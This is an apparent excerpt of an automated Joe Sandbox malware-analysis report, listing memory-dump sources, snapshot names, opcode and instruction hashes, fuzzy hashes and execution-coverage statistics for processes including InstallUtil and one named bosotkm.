                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: '$@
                            • API String ID: 0-1165437249
                            • Opcode ID: a4927c0a2fc957841d4d620541c46094f3e178ad561e5668f5bffdc4973c9ba4
                            • Instruction ID: b963d084e1e54aca3749b391967827294f7b3dcbc93d8219985628466a7179c1
                            • Opcode Fuzzy Hash: a4927c0a2fc957841d4d620541c46094f3e178ad561e5668f5bffdc4973c9ba4
                            • Instruction Fuzzy Hash: FE318C75E056188BDB5CDF2B8C4969AFBF7AFC9300F14C1FA880CA6214DB3049859F40
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: B$
                            • API String ID: 0-3862977591
                            • Opcode ID: e2b5f41413bf504f9d44f4d96bc7b98efc7922a5280f34be13bda9ba70ad1b23
                            • Instruction ID: e7a63d821540b7987c3094618ad12644abb16596375e70942e691aefc7bff47c
                            • Opcode Fuzzy Hash: e2b5f41413bf504f9d44f4d96bc7b98efc7922a5280f34be13bda9ba70ad1b23
                            • Instruction Fuzzy Hash: 3131DB71E096199BEB28DF6AC84869ABBF7BFC9300F10C1A9D419A7254DB305989CF01
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: dcc4f80cfee2ecebfda1810382d9734abb4c61f1a70ddb5f3fa3da56a62894cb
                            • Instruction ID: 5dde50002d5ab76b16778081e0d50e72be680061e7f37506a0f32855a696993e
                            • Opcode Fuzzy Hash: dcc4f80cfee2ecebfda1810382d9734abb4c61f1a70ddb5f3fa3da56a62894cb
                            • Instruction Fuzzy Hash: 6DB12874E05208CFDB14DFA5D498BEDBBBAFB89304F109069D81AA7295EB305C85CF45
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: c0f9bca745fc7eabdddec8292eeae9a9fe1c04d4c2ec3f57556dcd5d3e1a2979
                            • Instruction ID: 274b4e06331ba177f6c9c2f5aa3ecbc7fbd6da273cf143635c85553b1cced332
                            • Opcode Fuzzy Hash: c0f9bca745fc7eabdddec8292eeae9a9fe1c04d4c2ec3f57556dcd5d3e1a2979
                            • Instruction Fuzzy Hash: 9681A574E10218CFDB14DFAAD894A9DBBF2FF88310F14906AD809AB365DB349941CF60
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op$Ljp$Ljp
                            • API String ID: 0-600165640
                            • Opcode ID: b2e93631f48a56e1596378cd427e0410597d4f4f0aa97cfbdaeed17e1879df73
                            • Instruction ID: 37be6289a5fc15c9abb6072ef532840641e20f92afd2426eb2f5bf36ab4dd972
                            • Opcode Fuzzy Hash: b2e93631f48a56e1596378cd427e0410597d4f4f0aa97cfbdaeed17e1879df73
                            • Instruction Fuzzy Hash: 6381A574E00619CFDB14DFAAD884A9DBBF2FF89310F14906AE449AB365DB349941CF60
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0op
                            • API String ID: 0-2001708241
                            • Opcode ID: 5650a53e51ec0047d5ea303f3a7d528fa0f0fb0c6289f453332b70043d1f148d
                            • Instruction ID: e99d763e1552c4783594fe07692dfaf440a3d97a6b875249ab2dda91c17e62b1
                            • Opcode Fuzzy Hash: 5650a53e51ec0047d5ea303f3a7d528fa0f0fb0c6289f453332b70043d1f148d
                            • Instruction Fuzzy Hash: 0D61B774E00608DFDB14DFAAD884A9DBBF2FF89314F15806AD419AB365DB349942CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a0af2716b069d84538d99d8356f286dd168f9df13b7194f4db15fcf587c8624
                            • Instruction ID: 6d49411e8ebd5435198de34bd9c1ee2ce2b14de8b83738cb586bfbf15796d56e
                            • Opcode Fuzzy Hash: 8a0af2716b069d84538d99d8356f286dd168f9df13b7194f4db15fcf587c8624
                            • Instruction Fuzzy Hash: 6D826A75A00209DFCB15CFA8C894AAEBBF2FF88300F15855AE8459B3A1D735ED45CB61
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da97c2ebd9c4ad514e0dfb21d6a04fa2591ecd550c87a6d625ab083088b628e2
                            • Instruction ID: 19485006a41c56d0cb11a1abf5da2abd6b59371c9fce3ca85eb892f64a54fd83
                            • Opcode Fuzzy Hash: da97c2ebd9c4ad514e0dfb21d6a04fa2591ecd550c87a6d625ab083088b628e2
                            • Instruction Fuzzy Hash: 6972BF74E012298FDB64DF69C984BEDBBB2BB49301F1481EAD449AB355DB309E81CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8ef271bb302733563cfb1062f430ef0e8d7679cefb9e73b44df3d6ad7a7a4aa
                            • Instruction ID: bc62f0c4b00afdc2ebeea0a2b441eb1445f7b64df29c5930de9b1f51c4f23bc4
                            • Opcode Fuzzy Hash: e8ef271bb302733563cfb1062f430ef0e8d7679cefb9e73b44df3d6ad7a7a4aa
                            • Instruction Fuzzy Hash: 81125D74A002199FDB18DF69C854BAEBBF6BF88300F24856AE506DB391DB34DD45CB90
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13914978b38259b67e7c89d3f2c4e7a418b5564e917f4b1a1b88980fab5bff9c
                            • Instruction ID: be48da7bcff835548f1445049ca3c5f8c1a6900f334417a481887ef93f5ca30a
                            • Opcode Fuzzy Hash: 13914978b38259b67e7c89d3f2c4e7a418b5564e917f4b1a1b88980fab5bff9c
                            • Instruction Fuzzy Hash: A6122E74A002199FDB24CF69C844AAEBBF2FF49301F198066E455EB3A1D735DC55CBA0
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8f449231dbc5128c7ec09a93fa686cc07b86c2baa85035e30e0f78e09b1bd8a
                            • Instruction ID: 9f2cb4c9b1da21eadccebca5f366b0c207a418088a396ddc05529e83f8e8d688
                            • Opcode Fuzzy Hash: f8f449231dbc5128c7ec09a93fa686cc07b86c2baa85035e30e0f78e09b1bd8a
                            • Instruction Fuzzy Hash: 23D19274E01218CFDB14DFA5D994BADBBB2FF89300F2480AAD809A7355DB355A85CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aaa7b1526dc5f0b7d752403a51e65540a1c4dd31c3006df5650f8e3153f56bff
                            • Instruction ID: d055c2784f3c2763d3544d191c122d82756f17b4c7796df07ab5c75a4c0f3ffa
                            • Opcode Fuzzy Hash: aaa7b1526dc5f0b7d752403a51e65540a1c4dd31c3006df5650f8e3153f56bff
                            • Instruction Fuzzy Hash: 5B520334A00218CFEB55DFA4C860BAEBBB6EF95700F1081AAD20AA7355CF355D85DF61
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d789e12a55a4eacffdbbc4134f8c195a3e0747e85ecd62d20dd57ecc3919bda
                            • Instruction ID: 8ce76982ba2abfa36147b593c4ae977e8bb3cccfc245e85a34eb87d4586ba899
                            • Opcode Fuzzy Hash: 6d789e12a55a4eacffdbbc4134f8c195a3e0747e85ecd62d20dd57ecc3919bda
                            • Instruction Fuzzy Hash: EEF18F707046018FDB269F29C868B3976A6EF85700F1A44ABE152CF3F1DE25DC81E762
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3442a790ad78843a4ad0f8a015a256c7349cf384acd5fbc141a9cebc45871b0c
                            • Instruction ID: cd72ddca6c35da4493248859eddc4c327c7916dc30b7440626494dae75951307
                            • Opcode Fuzzy Hash: 3442a790ad78843a4ad0f8a015a256c7349cf384acd5fbc141a9cebc45871b0c
                            • Instruction Fuzzy Hash: A3125B34A04649CFCB24CF68D884A9EBBF1FF49314F15859AE8559B3A1E730ED41CBA0
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f1da434373bd056cbc3b0d6274c72b45acc628f1d69f45d42cbb852043d3c94a
                            • Instruction ID: 140e75e880ec96099b094e7e00a77d7db9c51065b586b2f2c7133798f5371334
                            • Opcode Fuzzy Hash: f1da434373bd056cbc3b0d6274c72b45acc628f1d69f45d42cbb852043d3c94a
                            • Instruction Fuzzy Hash: 1AF12A75A402158FCB15CF6CC984AADBBF2FF88311B1AC05AE515AB362D735EC42CB61
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65b6f9407cf4f7bc3a264a13d22228ccc7f8c6104bba324eecf57cdb908c6ce6
                            • Instruction ID: 8b311dd8f461096f1096b1ffcd1a31a3bc0da026ca3448e2eca16b1a95436140
                            • Opcode Fuzzy Hash: 65b6f9407cf4f7bc3a264a13d22228ccc7f8c6104bba324eecf57cdb908c6ce6
                            • Instruction Fuzzy Hash: EE22A67891021ACFDB54EF64E894B9DBBB2FF49301F1086A9D909A7358DB306E46CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0a22bf3e9a513e924ce816821008188b1177d2e4022a553b878ab104fcf3b6e
                            • Instruction ID: cdd33fc16aad08fd3b87e473d29cb1cf7bfd62542636039ccf2057fbaa8c9f2b
                            • Opcode Fuzzy Hash: c0a22bf3e9a513e924ce816821008188b1177d2e4022a553b878ab104fcf3b6e
                            • Instruction Fuzzy Hash: 1F22867891021ACFDB54EF64E894B9DBBB2FF48311F1086A9D909A7358DB306E46CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 296e90a41c42495edb6ade0ff011c8af535bce014520a691ad4ecf51580746da
                            • Instruction ID: 6b28286510dc20a6aff6d56526cfc9a896e890cc2905de267a0301705ceaaeba
                            • Opcode Fuzzy Hash: 296e90a41c42495edb6ade0ff011c8af535bce014520a691ad4ecf51580746da
                            • Instruction Fuzzy Hash: 84B10535704610DFEB158F34E854B2A7BE2AF89310F28856AE446CB385DF34DC45DBA0
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4dfdfeee859f2aab8a354bc209f466e72230a8fbf8bec68d1dcd43ff6d1ea209
                            • Instruction ID: 22ec51a2b943c8c11ad8306e1c08c4c5db2deb614fcad636af1a94a93233fbfd
                            • Opcode Fuzzy Hash: 4dfdfeee859f2aab8a354bc209f466e72230a8fbf8bec68d1dcd43ff6d1ea209
                            • Instruction Fuzzy Hash: CE817234A00A05CFDB14DF69D84896ABBF2FF89315B29816AE405DB369DB31DD41CBB0
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2adb4e6ad8aa7531df67383f417c3ba32900f53df3f4ccc3b61eb889cdce6214
                            • Instruction ID: a937cc669d5bf9ab83aa48b98960fa2c5f68c063d257b68afc4a5e2022aabd83
                            • Opcode Fuzzy Hash: 2adb4e6ad8aa7531df67383f417c3ba32900f53df3f4ccc3b61eb889cdce6214
                            • Instruction Fuzzy Hash: 557107347086458FCB65DF2CD898A6A7BE5AF49300F1940EAE915CB3B1EB71DC41CBA1
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ee53b030450ae80de81355cba234c3a0e480b3a4b56e8187eaff9155c9050e71
                            • Instruction ID: bd00fca10835f39f82bd10a6ce23609a69bf7162374a1c0a811d22cb1316365e
                            • Opcode Fuzzy Hash: ee53b030450ae80de81355cba234c3a0e480b3a4b56e8187eaff9155c9050e71
                            • Instruction Fuzzy Hash: E051C1788B1703CFD2642B20F6AC16A7FB4FB0F323756ED05A00EC51A59B7064698B60
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4300314caf232505cbb24f69851b6c21da9c67436254459079cbbece9576b5b8
                            • Instruction ID: 15a869049fdc7d5c542ddcb4e8085218811501152fd2ec093ad5f640c6aa7707
                            • Opcode Fuzzy Hash: 4300314caf232505cbb24f69851b6c21da9c67436254459079cbbece9576b5b8
                            • Instruction Fuzzy Hash: C551A2788B1703CFD2642B20F6AC12A7FB5FB0F323756ED05A00EC51A99B7064698B64
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e2fe13d6cc0c75080d91419bb512c6888af5f562e1b81cb41209a41419c58752
                            • Instruction ID: 0963af5a4fb3f989fb13046dbad2c2bd91a0ab519c338d59104e42939859e338
                            • Opcode Fuzzy Hash: e2fe13d6cc0c75080d91419bb512c6888af5f562e1b81cb41209a41419c58752
                            • Instruction Fuzzy Hash: 3B612778D01218CFDB25DFA4D854BAEBBB2FF89300F208569D805AB395DB755A4ACF40
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e43d95839068dc4704107dc06a6274148f48f970969a7eb03355eb8f866c0ec7
                            • Instruction ID: 22f35f81845376ce6acbbd3b6c9ddf35686c2ca2592f842dd06c18b6b3dc2ab4
                            • Opcode Fuzzy Hash: e43d95839068dc4704107dc06a6274148f48f970969a7eb03355eb8f866c0ec7
                            • Instruction Fuzzy Hash: 01519574E01208DFDB44DFA9D98499DBBF2FF89300F20916AE805AB364DB31A905CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7042869f595ad176c18bd0beb5849420a6641f5322a43bca96ae56f15e89c1d
                            • Instruction ID: a0ef4a7dcef485150eb3870f0fc8f5b387ec22936dda159de3df254f360aa051
                            • Opcode Fuzzy Hash: e7042869f595ad176c18bd0beb5849420a6641f5322a43bca96ae56f15e89c1d
                            • Instruction Fuzzy Hash: 9A51A874E01248DFCB08DFA9D59099DBBF2FF89310B20956AE805AB364DB31AD46CF50
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 90a980515e5676b5097a9085ec374d8743bd337e00a867fa4db7da318b170a94
                            • Instruction ID: 10f95d9f6ba6ef276ca96b99c626f36a5a2157709f5781ed8dbfe8d9dfb68771
                            • Opcode Fuzzy Hash: 90a980515e5676b5097a9085ec374d8743bd337e00a867fa4db7da318b170a94
                            • Instruction Fuzzy Hash: B151AC74D02228CFCB24DF64D984BEDBBB2EB89301F1055AAE409AB350D735AE85CF10
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a292006aaee63cf823db27690343330ace6158678b83627d644831cd9c76d2e
                            • Instruction ID: c25df1dac8ef55da8bed8fadfc5a5b322f28ac8172924f670911c4f70abb87d2
                            • Opcode Fuzzy Hash: 3a292006aaee63cf823db27690343330ace6158678b83627d644831cd9c76d2e
                            • Instruction Fuzzy Hash: 86411039B042049FCB199F69D854AAE7FF6AFCD311F24846AE906D7390CE358C05CBA1
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 02b8d25ef93a2703705b415070f417e973a5fbd541c6de1ad887defea2944fd2
                            • Instruction ID: 73bc238b1285486b50ac5a1b56366d526ac515ca2812ea27602a044dda266651
                            • Opcode Fuzzy Hash: 02b8d25ef93a2703705b415070f417e973a5fbd541c6de1ad887defea2944fd2
                            • Instruction Fuzzy Hash: 8B41AD31A04249DFCF11CFA8C8A4A9DFBB2EF4A310F158557E8559B391D336E915CB60
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9958ead8f770cd9bbda24ff5d86dfc6f790857662f92691ad2d2035f87fb5dc
                            • Instruction ID: c4065a80d2e4bd4264e65417d4484ab0dcf48ebbd1a7da2ebd6c18c4ebb28e56
                            • Opcode Fuzzy Hash: a9958ead8f770cd9bbda24ff5d86dfc6f790857662f92691ad2d2035f87fb5dc
                            • Instruction Fuzzy Hash: 08419A79C0925A9FCB11EFB898645EDBFF0FF5A300B1440AAD840A7391E7345949CBB1
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c22c50bd149dbd1516127782e995c885769942f11b1b8b8a9dfca9b32a0284b
                            • Instruction ID: 9df360bf16ee5784bc37772ec5e83b7a071629fd4e03b265721bda9fb85614ed
                            • Opcode Fuzzy Hash: 0c22c50bd149dbd1516127782e995c885769942f11b1b8b8a9dfca9b32a0284b
                            • Instruction Fuzzy Hash: ED31E935B003658BDF2D5A6A699427E65EAABC4350F1C443FD906C3380DFB8CE4596B2
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8ecfa8ad665d8cd1c071941f306ddf5a783907180065501a2f10ffe3e8f6ecf
                            • Instruction ID: d5526df913e94730fb84a81322a6e2acf29e8bc06c1a248fb6152cc616baf6c0
                            • Opcode Fuzzy Hash: b8ecfa8ad665d8cd1c071941f306ddf5a783907180065501a2f10ffe3e8f6ecf
                            • Instruction Fuzzy Hash: 7231C139740119AFCF199F64D844AAF7BA2FF88710F148426F9058B394CB75CD6ADBA0
                            Memory Dump Source
                            • Source File: 00000004.00000002.3455438480.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_dd0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2266cdcc386745ce289c2e65cbbe4a314fb9372a6d3bdd3b5e3ba370d241f23
                            • Instruction ID: cd66ad2d73fdb083fca0bfe1336243d0b73444d586e282030c87d29f92ef5c0d
                            • Opcode Fuzzy Hash: d2266cdcc386745ce289c2e65cbbe4a314fb9372a6d3bdd3b5e3ba370d241f23

                            Execution Graph

                            Execution Coverage:11.3%
                            Dynamic/Decrypted Code Coverage:99.3%
                            Signature Coverage:0%
                            Total number of Nodes:418
                            Total number of Limit Nodes:36
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541389122.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e50000_bosotkm.jbxd
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba4d147977d5c01ac2ba8889ef5db8e88d2ab2776dc9b5a77f483e5a9dbdb56e
                            • Instruction ID: 8ffdcaefcbad113ccf012c5fa27a372f9dc27a5bc0af5e2e61736f68cfb5c844
                            • Opcode Fuzzy Hash: ba4d147977d5c01ac2ba8889ef5db8e88d2ab2776dc9b5a77f483e5a9dbdb56e
                            • Instruction Fuzzy Hash: 0521C2323083109FD7248B6EE484A66BBE9EBC1365B15847AE18ED7245DF31EC45C790
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 503bdf344468f47578c3c03d74310ea13a6a60df4bc0710c5965706458895fc2
                            • Instruction ID: 426795c5462b2277a34e8e08523006f313464cfa69d07c97febf2978c98a0593
                            • Opcode Fuzzy Hash: 503bdf344468f47578c3c03d74310ea13a6a60df4bc0710c5965706458895fc2
                            • Instruction Fuzzy Hash: 4421CC76B101248FC704DB6DD85496E7BF6FF89A20B2540AAE506DB372DB30EC008B90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 92c3cc69ef85d5bd2bef2eff67f2d0f7d88468a491c0a9a4f8d9b16bfa572e7f
                            • Instruction ID: 1a31c51c7fe4db24bfb5cce8bbc50ef37925d07fb105798d592dec85cde0ca87
                            • Opcode Fuzzy Hash: 92c3cc69ef85d5bd2bef2eff67f2d0f7d88468a491c0a9a4f8d9b16bfa572e7f
                            • Instruction Fuzzy Hash: 6D218874F106198FCB04EF68D5448AEF7B5FF89700F10416AD546A7364EF30A906CBA1
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d92a0cc4b078f34b467f2f5a142a7d905d120ad69b9445f6bd4e44313a294c99
                            • Instruction ID: 9b94967036ee1d68c0b3ef4ec7884c79c48effb45d1e4cb4470496edbb8ab3e5
                            • Opcode Fuzzy Hash: d92a0cc4b078f34b467f2f5a142a7d905d120ad69b9445f6bd4e44313a294c99
                            • Instruction Fuzzy Hash: 5021E736B102258FDB149EA9D8458BEB7F6FF8426571054BAE497D7244EF30DE01CB60
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
